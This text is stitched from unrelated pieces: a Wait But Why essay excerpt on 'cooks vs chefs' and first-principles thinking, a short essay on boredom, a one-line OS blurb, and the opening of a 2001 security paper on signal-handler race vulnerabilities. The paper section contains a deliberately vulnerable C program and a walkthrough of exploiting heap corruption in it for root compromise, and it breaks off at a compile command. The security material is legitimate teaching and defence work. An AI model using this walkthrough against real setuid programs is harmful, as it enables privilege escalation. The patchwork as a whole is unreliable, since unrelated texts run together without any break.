With each of these questions, the challenge is to keep asking why until you hit the floor—and the floor is what will tell you whether you’re in a church or a lab for that particular part of your life. If a floor you hit is one or more first principles that represent the truth of reality or your inner self and the logic going upwards stays accurate to that foundation, you’re in the lab. If a Why? pathway hits a floor called “Because [authority] said so”—if you go down and down and realize at the bottom that the whole thing is just because you’re taking your parent’s or friend’s or religion’s or society’s word for it—then you’re in church there. And if the tenets of that church don’t truly resonate with you or reflect the current reality of the world—if it turns out that you’ve been working off of the wrong recipe—then whatever conclusions have been built on top of it will be just as wrong. As demonstrated by the flood geologists, a reasoning chain is only as strong as its weakest link.
[Image: False Dogma 1]
Astronomers once hit a similar wall in their progress trying to calculate the trajectories of the sun and planets in the Solar System. Then one day they discovered that the sun was at the center of things, not the Earth, and suddenly, all the perplexing calculations made sense, and progress leapt forward. Had they played the Why game earlier, they’d have run into a dogmatic floor right after the question “But how do we know that the Earth is at the center of everything?”
People’s lives are no different, which is why it’s so important to find the toxic lumps of false dogma tucked inside the layers of your reasoning software. Identifying one and adjusting it can strengthen the whole chain above and create a breakthrough in your life.
[Image: False Dogma 2]
The thing you really want to look closely for is unjustified certainty. Where in life do you feel so right about something that it doesn’t qualify as a hypothesis or even a theory, but it feels like a proof? When there’s proof-level certainty, it means either there’s some serious concrete and verified data underneath it—or it’s faith-based dogma. Maybe you feel certain that quitting your job would be a disaster or certain that there’s no god or certain that it’s important to go to college or certain that you’ve always had a great time on rugged vacations or certain that everyone loves it when you break out the guitar during a group hangout—but if it’s not well backed-up by data from what you’ve learned and experienced, it’s at best a hypothesis and at worst a completely false piece of dogma.
And if thinking about all of that ends with you drowning in some combination of self-doubt, self-loathing, and identity crisis, that’s perfect. This first epiphany is about humility. Humility is by definition a starting point—and it sends you off on a journey from there. The arrogance of certainty is both a starting point and an ending point—no journeys needed. That’s why it’s so important that we begin with “I don’t know shit.” That’s when we know we’re in the lab.
Epiphany 2) No one else knows shit either.
[Image: No one else knows shit]
Let me illustrate a little story for you.
[Image series: The Emperor’s New Clothes, illustrated]
Yes, it’s an old classic. The Emperor’s New Clothes. It was written in 1837 by Hans Christian Andersen10 to demonstrate a piece of trademark human insanity: the “This doesn’t seem right to me but everyone else says it’s right so it must be right and I’ll just pretend I also think it’s right so no one realizes I’m stupid” phenomenon.
My favorite all-time quote might be Steve Jobs saying this:
When you grow up, you tend to get told the world is the way it is and your life is just to live your life inside the world. Try not to bash into the walls too much. Try to have a nice family life, have fun, save a little money. That’s a very limited life. Life can be much broader once you discover one simple fact. And that is: Everything around you that you call life was made up by people that were no smarter than you. And you can change it, you can influence it, you can build your own things that other people can use. Once you learn that, you’ll never be the same again.11
This is Jobs’ way of saying, “You might not know shit. But no one knows shit. If the emperor looks naked to you and everyone else is saying he has clothes, trust your eyes since other people don’t know anything you don’t.”
It’s an easy message to understand, a harder one to believe, and an even harder one to act on.
The purpose of the first epiphany is to shatter the belief that all that dogma you’ve memorized constitutes personal opinions and wisdom and all that certainty you feel constitutes knowledge and understanding. That’s the easier one because the delusion that we know what we’re talking about is pretty fragile, with the “Oh god I’m a fraud who doesn’t know shit” monster never lurking too far under our consciousness.
But this epiphany—that the collective “other people” and their conventional wisdom don’t know shit—is a much larger challenge. Our delusion about the wisdom of those around us, our tribe, and society as a whole is much thicker and runs much deeper than the delusion about ourselves. So deep that we’ll see a naked emperor and ignore our own eyes if everyone else says he has clothes on.
This is a battle of two kinds of confidence—confidence in others vs. confidence in ourselves. For most cooks, confidence in others usually comes out the winner.
To swing the balance, we need to figure out how to lose respect for the general public, our tribe’s dogma, and society’s conventional wisdom. We have a bunch of romantic words for the world’s chefs that sound impressive but are actually just a result of them having lost this respect. Being a gamechanger is just having little enough respect for the game that you realize there’s no good reason not to change the rules. Being a trailblazer is just not respecting the beaten path and so deciding to blaze yourself a new one. Being a groundbreaker is just knowing that the ground wasn’t laid by anyone that impressive and so feeling no need to keep it intact.
Not respecting society is totally counterintuitive to what we’re taught when we grow up—but it makes perfect sense if you just look at what your eyes and experience tell you.
There are clues all around showing us that conventional wisdom doesn’t know shit. Conventional wisdom worships the status quo and always assumes that everything is the way it is for a good reason—and history is one long record of status quo dogma being proven wrong again and again, every time some chef comes around and changes things.
And if you open your eyes, there are other clues all through your own life that the society you live in is nothing to be intimidated by. All the times you learn about what really goes on inside a company and find out that it’s totally disorganized and badly run. All the people in high places who can’t seem to get their personal lives together. All the well-known sitcoms whose jokes you’re pretty sure you could have written when you were 14. All the politicians who don’t seem to know more about the world than you.
And yet, the delusion that society knows shit that you don’t runs deep, and still, somewhere in the back of your head, you don’t think it’s realistic that you could ever actually build that company, achieve that fabulous wealth or celebrity status, create that TV show, win that Senate campaign—no matter what it seems like.
Sometimes it takes an actual experience to fully expose society for the shit it doesn’t know. One example from my life is how I slowly came to understand that most Americans—the broader public, my tribe, and people I know well—knew very little about what it’s actually like to visit most countries. I grew up hearing about how dangerous it was to visit really foreign places, especially alone. But when I started going places I wasn’t supposed to go, I kept finding that the conventional wisdom had been plain wrong about it. As I had more experiences and gathered more actual data, I grew increasingly trusting of my own reasoning over whatever Americans were saying. And as my confidence grew, places like Thailand and Spain turned into places like Oman and Uzbekistan, which turned into places like Nigeria and North Korea. When it comes to traveling, I had the epiphany: other people’s strong opinions about this are based on unbacked-up dogma, and the fact that most people I talk to feel the same way means nothing if my own research, experience, and selective question-asking bring me to a different conclusion.12 When it comes to picking travel destinations, I’ve become a chef.
I try to leverage what I learned as a traveler to transfer the chefness elsewhere—when I find myself discouraged in another part of my life by the warnings and head-shaking of conventional wisdom, I try to remind myself: “These are the same people that were sure that North Korea was dangerous.” It’s hard—you have to take the leap to chefdom separately in each part of your life—but it seems like with each successive cook → chef breakthrough, future breakthroughs become easier to come by. Eventually, you must hit a tipping point and trusting your own software becomes your way of life—and as Jobs says, you’ll never be the same again.
The first epiphany was about shattering a protective shell of arrogance to lay bare a starting point of humility. This second epiphany is about confidence—the confidence to emerge from that humility through a pathway built on first principles instead of by analogy. It’s a confidence that says, “I may not know much, but no one else does either, so I might as well be the most knowledgeable person on Earth.”
Epiphany 3) You’re playing Grand Theft Life
[Image: Grand Theft Life]
The first two epiphanies allow us to break open our software, identify which parts of it were put there by someone else, and with confidence begin to fill in the Want and Reality boxes with our own handwriting and choose a goal and a strategy that’s right for us.
But then we hit a snag. We’re finally in the lab with all our tools and equipment, but something holds us back. To figure out why, let’s bring back our emperor story.
When the emperor struts out with his shoulder hair and his gut and his little white junk, the story only identifies two kinds of people: the mass of subjects, who all pretend they can see the clothes, and the kid, who just says that the dude is obviously naked.
But I think there’s more going on. In an emperor’s new clothes situation, there are four kinds of people:
1) Proud Cook. Proud Cook is the person drinking the full dogma Kool-Aid. Whatever independent-thinking voice is inside of Proud Cook was silenced long ago, and there’s no distinction between his thoughts and the dogma he follows. As far as he’s concerned, the dogma is truth—but since he doesn’t even register that there’s any dogma happening, Proud Cook simply thinks he’s a very wise person who has it all figured out. He feels the certainty of the dogma running through his veins. When the emperor walks out and proclaims that he is wearing beautiful new clothes, Proud Cook actually sees clothes, because his consciousness isn’t even turned on.
2) Insecure Cook. Insecure Cook is what Proud Cook turns into after undergoing Epiphany #1. Insecure Cook has had a splash of self-awareness—enough to become conscious of the fact that he doesn’t actually know why he’s so certain about the things he’s certain about. Whatever the reasons are, he’s sure they’re right, but he can’t seem to come up with them himself. Without the blissful arrogance of Proud Cook, Insecure Cook is lost in the world, wondering why he’s too dumb to get what everyone else gets and trying to watch others to figure out what he’s supposed to do—all while hoping nobody finds out that he doesn’t get it. When Insecure Cook sees the emperor, his heart sinks—he doesn’t see the clothes, only the straggly gray hairs of the emperor’s upper thighs. Ashamed, he reads the crowd and mimics their enthusiasm for the clothes.
3) Self-Loathing Cook. Self-Loathing Cook is what Insecure Cook becomes after being hit by Epiphany #2. Epiphany #2 is the forbidden fruit, and Self-Loathing Cook has bitten it. He now knows exactly why he didn’t feel certain about everything—because it was all bullshit. He sees the tenets of conventional wisdom for what they really are—faith-based dogma. He knows that neither he nor anyone else knows shit and that he’ll get much farther riding his own reasoning than jumping on the bandwagon with the masses. When the emperor emerges, Self-Loathing Cook thinks, “Oh Jesus…this fucktard is actually outside with no clothes on. Oh—oh and my god these idiots are all pretending to see clothes. How is this my life? I need to move.”
But then, right when he’s about to call everyone out on their pretending and the emperor out on his bizarre life decision, there’s a lump in his throat. Sure, he knows there are no clothes on that emperor’s sweaty lower back fat roll—but actually saying that? Out loud? I mean, he’s sure and all—but let’s not go crazy here. Better not to call too much attention to himself. And of course, there’s a chance he’s missing something. Right?
Self-Loathing Cook ends up staying quiet and nodding at the other cooks when they ask him if those clothes aren’t just the most marvelous he’s ever seen.
4) The chef. The kid in the story. The chef is Self-Loathing Cook—except without the irrational fear. The chef goes through the same inner thought process as Self-Loathing Cook, but when it’s time to walk the walk, the chef stands up and yells out the truth.
A visual recap:
[Image: 4 Subjects]
We’re all human and we’re all complex, which means that in various parts of each of our lives, we play each of these four characters.
But to me, Self-Loathing Cook is the most curious one of the four. Self-Loathing Cook gets it. He knows what the chefs know. He’s tantalizingly close to carving out his own chef path in the world, and he knows that if he just went for it, good things would happen. But he can’t pull the trigger. He built himself a pair of wings he feels confident work just fine, but he can’t bring himself to jump off the cliff.
And as he stands there next to the cliff with the other cooks, he has to endure the torture of watching the chefs of the world leap off the edge with the same exact wings and flying skills he has, but with the courage he can’t seem to find.
To figure out what’s going on with Self-Loathing Cook, let’s remind ourselves how the chefs operate.
Free of Self-Loathing Cook’s trepidation, the world’s chefs are liberated to put on their lab coats and start sciencing. To a chef, the world is one giant laboratory, and their life is one long lab session full of a million experiments. They spend their days puzzling, and society is their game board.
The chef treats his goals and undertakings as experiments whose purpose is as much to learn new information as it is to be ends in themselves. That’s why when I asked Musk what his thoughts were on negative feedback, he answered with this:
I’m a huge believer in taking feedback. I’m trying to create a mental model that’s accurate, and if I have a wrong view on something, or if there’s a nuanced improvement that can be made, I’ll say, “I used to think this one thing that turned out to be wrong—now thank goodness I don’t have that wrong belief.”
To a chef in the lab, negative feedback is a free boost forward in progress, courtesy of someone else. Pure upside.
As for the F word…the word that makes our amygdalae quiver in the moonlight, the great chefs have something to say about that too:
Failure is simply the opportunity to begin again, this time more intelligently. —Henry Ford
Success is going from failure to failure without losing your enthusiasm. —Winston Churchill10
I have not failed 700 times. I’ve succeeded in proving 700 ways how not to build a lightbulb. —Thomas Edison
There’s no more reliable corollary than super-successful people thinking failure is fucking awesome.
But there’s something to that. The science approach is all about learning through testing hypotheses, and hypotheses are built to be disproven, which means that scientists learn through failure. Failure is a critical part of their process.
It makes sense. If there were two scientists trying to come up with a breakthrough in cancer treatment, and the first one is trying every bold thing he can imagine, failing left and right and learning something each time, while the second one is determined not to have any failures so is making sure his experiments are similar to others that have already been proven to work—which scientist would you bet on?
It’s not surprising that so many of the most wildly impactful people seem to treat the world like a lab and their life like an experiment session—that’s the best way to succeed at something.
But for most of us, we just can’t do it. Even poor Self-Loathing Cook, who is so damn close to being a chef—but somehow so far away.
So what’s stopping him? I think two major misconceptions:
Misconception 1: Misplaced Fear
We talked about the chef’s courage actually just being an accurate assessment of risk—and that’s one of the major things Self-Loathing Cook is missing. He thinks he has become wise to the farce of letting dogma dictate your life, but he’s actually in the grasp of dogma’s slickest trick.
Humans are programmed to take potential fear very seriously, and evolution didn’t find it efficient to have us assess and re-assess every fear inside of us. It went instead with the “better safe than sorry” philosophy—i.e. if there’s a chance that a certain fear might be based on real danger, file it away as a real fear, just in case, and even if you confirm later that a fear of yours has no basis, keep it with you, just in case. Better safe than sorry.
And the fear file cabinet is somewhere way down in our psyches—somewhere far below our centers of rationality, out of reach.
The purpose of all of that fear is to make us protect ourselves from danger. The problem for us is that as far as evolution is concerned, danger = something that hurts the chance that your genes will move on—i.e., danger = not mating or dying or your kids dying, and that’s about it.
So in the same way our cook-like qualities were custom-built for survival in tribal times, our obsession with fears of all shapes and sizes may have served us well in Ethiopia 50,000 years ago—but it mostly ruins our lives today.
Because not only does it amp up our fear in general to “shit we botched the hunt now the babies are all going to starve to death this winter” levels even though we live in an “oh no I got laid off now I have to sleep at my parents’ house for two months with a feather pillow in ideal 68º temperature” world—but it also programs us to be terrified of all the wrong things. We’re more afraid of public speaking than of texting on the highway, more afraid of approaching an attractive stranger in a bar than of marrying the wrong person, more afraid of not being able to afford the same lifestyle as our friends than of spending 50 years in a meaningless career—all because embarrassment, rejection, and not fitting in really sucked for hunters and gatherers.
This leaves most of us with a skewed danger scale:
[Image: Danger Scale]
Chefs hate real risk just as much as cooks—a chef who ventures into Actually Dangerous territory and ends up in jail or in a gutter or in dire financial straits isn’t a chef—he’s a cook living under “I’m invincible” dogma. When we see chefs displaying what looks like incredible courage, they’re usually just in the Chef Lab. The Chef Lab is where all the action is and where the path to many people’s dreams lies—dreams about their career, about love, about adventure. But even though its doors are always open, most people never set foot in it, for the same reason so many Americans never visit some of the world’s most interesting countries—because of an incorrect assumption that it’s a dangerous place. By reasoning by analogy about what constitutes danger and ending up with a misconception, Self-Loathing Cook is missing out on all the fun.
Misconception 2: Misplaced Identity
The second major problem for Self-Loathing Cook is that, like all cooks, he can’t wrap his head around the fact that he’s the scientist in the lab—not the experiment.
As we established earlier, conscious tribe members reach conclusions, while blind tribe members are conclusions. And what you believe, what you stand for, and what you choose to do each day are conclusions that you’ve drawn. In some cases, very, very publicly.
As far as society is concerned, when you give something a try—on the values front, the fashion front, the religious front, the career front—you’ve branded yourself. And since people like to simplify people in order to make sense of things in their own head, the tribe around you reinforces your brand by putting you in a clearly-labeled, oversimplified box.
What this all amounts to is that it becomes very painful to change. Changing is icky for someone whose identity will have to change along with it. And others don’t make things any easier. Blind tribe members don’t like when other tribe members change—it confuses them, it forces them to readjust the info in their heads, and it threatens the simplicity of their tribal certainty. So attempts to evolve are often met with mockery or anger or opposition.
And when you have a hard time changing, you become attached to who you currently are and what you’re currently doing—so attached that it blurs the distinction between the scientist and the experiment and you forget that they’re two different things.
We talked about why scientists welcome negative feedback about their experiments. But when you are the experiment, negative feedback isn’t a piece of new, helpful information—it’s an insult. And it hurts. And it makes you mad. And because changing feels impossible, there’s not much good that feedback can do anyway—it’s like giving parents negative feedback on the name of their one-month-old child.
We discussed why scientists expect plenty of their experiments to fail. But when you and the experiment are one and the same, not only is taking on a new goal a change of identity, it’s putting your identity on the line. If the experiment fails, you fail. You are a failure. Devastating. Forever.
I talked to Musk about the United States and the way the forefathers reasoned by first principles when they started the country. He said he thought the reason they could do so is that they had a fresh slate to work with. The European countries of that era would have had a much harder time trying to do something like that—because, as he told me, they were “trapped in their own history.”
I’ve heard Musk use this same phrase to describe the big auto and aerospace companies of today. He sees Tesla and SpaceX like the late 18th century USA—fresh new labs ready for experiments—but when he looks at other companies in their industries, he sees an inability to drive their strategies from a clean slate mentality. Referring to the aerospace industry, Musk said, “There’s a tremendous bias against taking risks. Everyone is trying to optimize their ass-covering.”
Being trapped in your history means you don’t know how to change, you’ve forgotten how to innovate, and you’re stuck in the identity box the world has put you in. And you end up being the cancer researcher we mentioned who only tries likely-to-succeed experimentation within the comfort zone he knows best.
It’s for this reason that Steve Jobs looks back on his firing from Apple in 1985 as a blessing in disguise. He said: “Getting fired from Apple was the best thing that could have ever happened to me. The heaviness of being successful was replaced by the lightness of being a beginner again. It freed me to enter one of the most creative periods of my life.” Being fired “freed” Jobs from the shackles of his own history.
So what Self-Loathing Cook has to ask himself is: “Am I trapped in my own history?” As he stands on the cliff with his wings ready for action and finds himself paralyzed—from evolving as a person, from making changes in his life, from trying to do something bold or unusual—is the baggage of his own identity part of what’s holding him back?
Self-Loathing Cook’s beliefs about what’s scary aren’t any more real than Insecure Cook’s assumption that conventional wisdom has all the answers—but unlike the “Other people don’t know shit” epiphany, which you can observe evidence of all over the place, the epiphany that neither failing nor changing is actually a big deal can only be observed by experiencing it for yourself. Which you can only do after you overcome those fears…which only happens if you experience changing and failing and realize that nothing bad happens. Another catch-22.
These are the reasons I believe so many of the world’s most able people are stuck in life as Self-Loathing Cook, one epiphany short of the promised land.
The challenge with this last epiphany is to somehow figure out a way to lose respect for your own fear. That respect is in our wiring, and the only way to weaken it is by defying it and seeing, when nothing bad ends up happening, that most of the fear you’ve been feeling has just been a smoke and mirrors act. Doing something out of your comfort zone and having it turn out okay is an incredibly powerful experience, one that changes you—and each time you have that kind of experience, it chips away at your respect for your brain’s ingrained, irrational fears.
Because the most important thing the chef knows that the cooks don’t is that real life and Grand Theft Auto aren’t actually that different. Grand Theft Auto is a fun video game because it’s a fake world where you can do things with no fear. Drive 200mph on the highway. Break into a building. Run over a prostitute with your car. All good in GTA.
Unlike GTA, in real life, the law is a thing and jail is a thing. But that’s about where the differences end. If someone gave you a perfect simulation of today’s world to play in and told you that it’s all fake with no actual consequences—with the only rules being that you can’t break the law or harm anyone, and you still have to make sure to support your and your family’s basic needs—what would you do? My guess is that most people would do all kinds of things they’d love to do in their real life but wouldn’t dare to try, and that by behaving that way, they’d end up quickly getting a life going in the simulation that’s both far more successful and much truer to themselves than the real life they’re currently living. Removing the fear and the concern with identity or the opinions of others would thrust the person into the not-actually-risky Chef Lab and have them bouncing around all the exhilarating places outside their comfort zone—and their lives would take off. That’s the life irrational fears block us from.
When I look at the amazing chefs of our time, what’s clear is that they’re more or less treating real life as if it’s Grand Theft Life. And doing so gives them superpowers. That’s what I think Steve Jobs meant all the times he said, “Stay hungry. Stay foolish.”
And that’s what this third epiphany is about: fearlessness.
So if we want to think like a scientist more often in life, those are the three key objectives—to be humbler about what we know, more confident about what’s possible, and less afraid of things that don’t matter.
It’s a good plan—but also, ugh. Right? That’s a lot of stuff to try to do.
Usually at the end of a post like this, the major point seems manageable and concrete, and I finish writing it all excited to go be good at shit. But this post was like, “Here’s everything important and go do it.” So how do we work with that?
I think the key is to not try to be a perfect chef or expect that of yourself whatsoever. Because no one’s a perfect chef—not even Elon. And no one’s a pure cook either—nothing’s black and white when you’re talking about an animal species whose brains contain 86 billion neurons. The reality is that we’re all a little of both, and where we are on that spectrum varies in 100 ways, depending on the part of life in question, the stage we’re in of our evolution, and our mood that day.
If we want to improve ourselves and move our way closer to the chef side of the spectrum, we have to remember to remember. We have to remember that we have software, not just hardware. We have to remember that reasoning is a skill and like any skill, you get better at it if you work on it. And we have to remember the cook/chef distinction, so we can notice when we’re being like one or the other.
It’s fitting that this blog is called Wait But Why because the whole thing is a little like the adult version of the Why? game. After emerging from the blur of the arrogance of my early twenties, I began to realize that my software was full of a lot of unfounded certainty and blind assumptions and that I needed to spend some serious time deconstructing—which is the reason that every Wait But Why post, no matter what the topic, tends to start off with the question, “What’s really going on here?”
For me, that question is the springboard into all of this remembering to remember—it’s a hammer that shatters a brittle, protective feeling of certainty and forces me to do the hard work of building a more authentic, more useful set of thoughts about something. Or at least a better-embraced bewilderment.
And when I started learning about Musk in preparation to write these posts, it hit me that he wasn’t just doing awesome things in the world—he was a master at looking at the world, asking “What’s really going on here?” and seeing the real answer. That’s why his story resonated so hard with me and why I dedicated so much Wait But Why time to this series.
But also, Mars. Let’s all go, okay?
Confessing to boredom is confessing to a character flaw. Popular culture is littered with advice on how to shake it off: find like-minded people, take up a hobby, find a cause and work for it, take up an instrument, read a book, clean your house. And certainly don’t let your kids be bored: enroll them in swimming, soccer, dance, church groups – anything to keep them from assuaging their boredom by gravitating toward sex and drugs. To do otherwise is to admit that we’re not engaging with the world around us. Or that our cellphones have died.
But boredom is not tragic. Properly understood, boredom helps us understand time, and ourselves. Unlike fun or work, boredom is not about anything; it is our encounter with pure time as form and content. With ads and screens and handheld devices ubiquitous, we don’t get to have that experience that much anymore. We should teach the young people to feel comfortable with time.
I live and teach in small-town Pennsylvania, and some of my students from bigger cities tell me that they always go home on Fridays because they are bored here.
Do you know the best antidote to boredom? I asked them. They looked at me expectantly, smartphones dangling from their hands. Think, I told them. Thinking is the best antidote to boredom. I am not kidding, kids. Thinking is the best antidote to boredom. Tell yourself, I am bored. Think about that. Isn’t that interesting? They looked at me incredulously. Thinking is not how they were brought up to handle boredom.
When you’re bored, time moves slowly. The German word for “boredom” expresses this: Langeweile, a compound made of “lange,” which means “long,” and “Weile,” meaning “a while.” And slow-moving time can feel torturous for people who can’t feel peaceful alone with their minds. Learning to feel peaceful alone with your mind is why learning to be bored is so crucial. It is a great privilege if you can do this without going to the psychiatrist.
So lean in to boredom, into that intense experience of time untouched by beauty, pleasure, comfort and all other temporal salubrious sensations. Observe it, how your mind responds to boredom, what you feel and think when you get bored. This form of metathinking can help you overcome your boredom, and learn about yourself and the world in the process. If meditating on nothing is too hard at the outset, at the very least you can imitate William Wordsworth and let that host of golden daffodils flash upon your inward eye: emotions recollected in tranquility – that is, reflection – can fill empty hours while teaching you, slowly, how to sit and just be in the present.
Don’t replace boredom with work or fun or habits. Don’t pull out a screen at every idle moment. Boredom is the last privilege of a free mind. The currency with which you barter with folks who will sell you their “habit,” “fun” or “work” is your clear right to practice judgment, discernment and taste. In other words, always trust when boredom speaks to you. Instead of avoiding it, heed its messages, because they’ll keep you true to yourself.
It might be beneficial to think through why something bores you. You will get a whole new angle on things. Hold on to your boredom; you won’t notice how quickly time goes by once you start thinking about the things that bore you.
An ultra-secure VM-based OS (all the windows live in a single workspace, it's very clean, see the screenshots).
"Delivering Signals for Fun and Profit"
Understanding, exploiting and preventing signal-handling
related vulnerabilities.
Michal Zalewski <lcamtuf@razor.bindview.com>
(C) Copyright 2001 BindView Corporation
According to popular belief, writing signal handlers has little or nothing
to do with secure programming, as long as the handler code itself looks good.
At the same time, there have been discussions on which functions may safely
be invoked from handlers, and which functions should never, ever be used there.
Most Unix systems provide a standardized set of signal-safe library calls.
A few systems have extensive documentation of these signal-safe calls - among
them OpenBSD and Solaris:
http://www.openbsd.org/cgi-bin/man.cgi?query=sigaction:
"The following functions are either reentrant or not interruptible by sig-
nals and are async-signal safe. Therefore applications may invoke them,
without restriction, from signal-catching functions:
_exit(2), access(2), alarm(3), cfgetispeed(3), cfgetospeed(3),
cfsetispeed(3), cfsetospeed(3), chdir(2), chmod(2), chown(2),
close(2), creat(2), dup(2), dup2(2), execle(2), execve(2),
fcntl(2), fork(2), fpathconf(2), fstat(2), fsync(2), getegid(2),
geteuid(2), getgid(2), getgroups(2), getpgrp(2), getpid(2),
getppid(2), getuid(2), kill(2), link(2), lseek(2), mkdir(2),
mkfifo(2), open(2), pathconf(2), pause(2), pipe(2), raise(3),
read(2), rename(2), rmdir(2), setgid(2), setpgid(2), setsid(2),
setuid(2), sigaction(2), sigaddset(3), sigdelset(3),
sigemptyset(3), sigfillset(3), sigismember(3), signal(3),
sigpending(2), sigprocmask(2), sigsuspend(2), sleep(3), stat(2),
sysconf(3), tcdrain(3), tcflow(3), tcflush(3), tcgetattr(3),
tcgetpgrp(3), tcsendbreak(3), tcsetattr(3), tcsetpgrp(3), time(3),
times(3), umask(2), uname(3), unlink(2), utime(3), wait(2),
waitpid(2), write(2). sigpause(3), sigset(3).
All functions not in the above list are considered to be unsafe with
respect to signals. That is to say, the behaviour of such functions when
called from a signal handler is undefined. In general though, signal
handlers should do little more than set a flag; most other actions are
not safe."
It is suggested to take special care when performing any non-atomic
operations while signal delivery is not blocked, and not to rely on
internal program state inside a signal handler. Generally, whenever
possible, a signal handler should do little more than set a flag.
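To make that recommendation concrete, here is a minimal sketch of mine (not
part of the original text; the file name is made up) of the flag-only pattern:
the handler sets a volatile sig_atomic_t flag and nothing else, and the actual
cleanup happens later, in normal program context.

--- flagdemo.c (illustrative sketch, hypothetical file name) ---

#include <signal.h>
#include <stdio.h>
#include <unistd.h>

/* sig_atomic_t writes are atomic with respect to signal delivery;
   volatile keeps the compiler from caching the value in a register. */
static volatile sig_atomic_t got_sighup = 0;

static void handler(int sig) {
  (void)sig;
  got_sighup = 1;   /* the only thing the handler does */
}

int main(void) {
  signal(SIGHUP, handler);
  for (;;) {
    if (got_sighup) {
      got_sighup = 0;
      /* syslog(), free(), unlink() and other non-reentrant calls are
         safe here, because we are no longer inside a signal handler. */
      printf("Got SIGHUP, doing cleanup in the main loop\n");
    }
    sleep(1);   /* a real program would do its normal work here */
  }
}

---- EOF ----

The main loop (or a select()/poll() loop) then decides when it is safe to act
on the flag.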
Unfortunately, there have been no known, practical demonstrations of the
security impact of such bad coding practices. And while a signal can be
delivered at almost any point during the userspace execution of a given
program, most programmers never take enough care to avoid the potential
consequences of this fact. Approximately 80 to 90% of the signal handlers
we have examined were written in an insecure manner.
This paper is an attempt to demonstrate and analyze the actual risks caused
by this kind of coding practice, and to discuss threat scenarios that can be
used by an attacker in order to escalate local privileges or, sometimes,
gain remote access to a machine. This class of vulnerabilities affects
numerous complex setuid programs (Sendmail, screen, pppd, etc.) and
several network daemons (ftpd, httpd and so on).
Thanks to Theo de Raadt for bringing this problem to my attention;
to Przemyslaw Frasunek for discussion of remote attack possibilities; to
Dvorak, Chris Evans and Pekka Savola for their outstanding contributions to
the field of heap corruption attacks; and to Gregory Neil Shapiro and Solar
Designer for their comments on the issues discussed below. Additional thanks
to Mark Loveless, Dave Mann, Matt Power and other RAZOR team members for
their support and reviews.
Before we discuss more generalized attack scenarios, I would like to explain
signal handler races, starting with a very simple and clean example. We will
try to exploit a non-atomic signal handler. The following code illustrates,
in a simplified way, a very common bad coding practice (present, for
example, in the setuid root Sendmail program up to 8.11.3 and 8.12.0.Beta7):
/*****
 * Signal handler, shared by SIGHUP and SIGTERM:
 *****/

void sighndlr(int dummy) {
  syslog(LOG_NOTICE, user_dependent_data);
  // Initial cleanup code, calling the following somewhere:
  free(global_ptr2);
  free(global_ptr1);
  // 1 *** >> Additional clean-up code - unlink tmp files, etc <<
  exit(0);
}

/*****
 * This is part of the main code, somewhere
 * at the beginning of main code:
 *****/

  signal(SIGHUP, sighndlr);
  signal(SIGTERM, sighndlr);

  // Other initialization routines, and global pointer
  // assignment somewhere in the code (we assume that
  // *** nnn is partially user-dependent, yyy does not have to be):
  global_ptr1 = malloc(nnn);
  global_ptr2 = malloc(yyy);

  // 2 >> further processing, allocated memory <<
  // 2 >> is filled with any data, etc... <<
This code seems to be pretty much immune to any kind of security compromise.
But that is just an illusion. By delivering one of the signals handled by the
sighndlr() function somewhere in the middle of main code execution (marked
as ' 2 ' in the example above), the attacker makes execution jump to the
handler function. Let's assume we delivered SIGHUP. The syslog message is
written, the two pointers are freed, and some more clean-up is done before
exiting ( 1 ).
Now, by quickly delivering another signal - SIGTERM (note that the signal
already being handled is masked and would not be delivered again, so you
cannot deliver a second SIGHUP, but there is absolutely nothing preventing
delivery of SIGTERM) - the attacker can cause the sighndlr() function to be
re-entered. This is a very common situation - 'shared' handlers are declared
for SIGQUIT, SIGTERM, SIGINT, and so on.
Now, for the purpose of this demonstration, we would like to target heap
structures by exploiting free() and syslog() behavior. It is very important
to understand how the [v]syslog() implementation works. We will focus on the
Linux glibc code - this function creates a temporary copy of the logged
message in a so-called memory-buffer stream, which is dynamically allocated
using two malloc() calls - the first one allocates a general stream
description structure, and the other creates the actual buffer that will
contain the logged message.
Please refer to the following URL for the vsyslog() function sources:
Stream management functions (open_memstream, etc.) can be found at:
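As a rough illustration of the allocation pattern described above, here is a
small sketch of my own (not glibc code, and simplified compared to the real
implementation) showing how open_memstream() produces both a stream structure
and a heap buffer that grows as the message is written:

--- memstream_demo.c (illustrative sketch, hypothetical file name) ---

#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>

int main(void) {
  char *buf = NULL;   /* will point to the heap buffer holding the message */
  size_t len = 0;

  /* First allocation: the stream bookkeeping structures. */
  FILE *f = open_memstream(&buf, &len);
  if (f == NULL)
    return 1;

  /* Further allocation: the message buffer itself, which grows as data
     is written - this is where user-dependent log data ends up, and it
     can land on a chunk that was free()d earlier. */
  fprintf(f, "%s", "user-controlled log message");
  fclose(f);

  printf("%zu bytes buffered at %p\n", len, (void *)buf);
  free(buf);
  return 0;
}

---- EOF ----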
In order for this particular attack to be successful, two conditions have
to be met:

 - the syslog() data must be user-dependent (as it is in the Sendmail log
   messages describing transferred mail traffic),

 - the second of these two global memory blocks must be aligned in such a
   way that it gets re-used by the second open_memstream() malloc() call.

The second buffer (global_ptr2) is free()d during the first sighndlr()
call, so if these conditions are met, the syslog() call made from the
re-entered handler re-uses this memory and overwrites the area, including
heap-management structures, with the user-dependent syslog() buffer.
Of course, this situation is not limited to two global buffers - generally,
we need one out of any number of free()d buffers to be aligned that way.
Additional possibilities come from interrupting the free() chain with
precisely timed SIGTERM delivery and/or from influencing buffer sizes and
heap layout by using different input data patterns.
If so, the attacker can cause the second free() pass to be called with a
pointer to user-dependent data (the syslog buffer). This leads to an instant
root compromise - see the excellent article by Chris Evans (based on
observations by Pekka Savola):
Practical discussion and exploit code for the vulnerability discussed in
the above article can be found here:
http://security-archive.merton.ox.ac.uk/bugtraq-200010/0084.html
Below is a sample 'vulnerable program' code:
--- vuln.c ---
#include <signal.h>
#include <syslog.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>   /* for sleep() */

void *global1, *global2;   /* heap pointers freed in the handler */
char *what;                /* user-controlled string logged via syslog() */

void sh(int dummy) {
  syslog(LOG_NOTICE, "%s\n", what);
  free(global2);
  free(global1);
  sleep(10);   /* window for delivering the second signal */
  exit(0);
}

int main(int argc, char *argv[]) {
  what = argv[1];
  global1 = strdup(argv[2]);
  global2 = malloc(340);
  signal(SIGHUP, sh);
  signal(SIGTERM, sh);
  sleep(10);   /* window for delivering the first signal */
  exit(0);
}
---- EOF ----
You can exploit it, forcing free() to be called on a memory region filled
with 0x41414141 (you can see this value in the registers at the time
of crash -- the bytes represented as 41 in hex are set by the 'A'
input characters in the variable $LOG below). Sample command lines
for a Bash shell are:
$ gcc vuln.c -o vuln
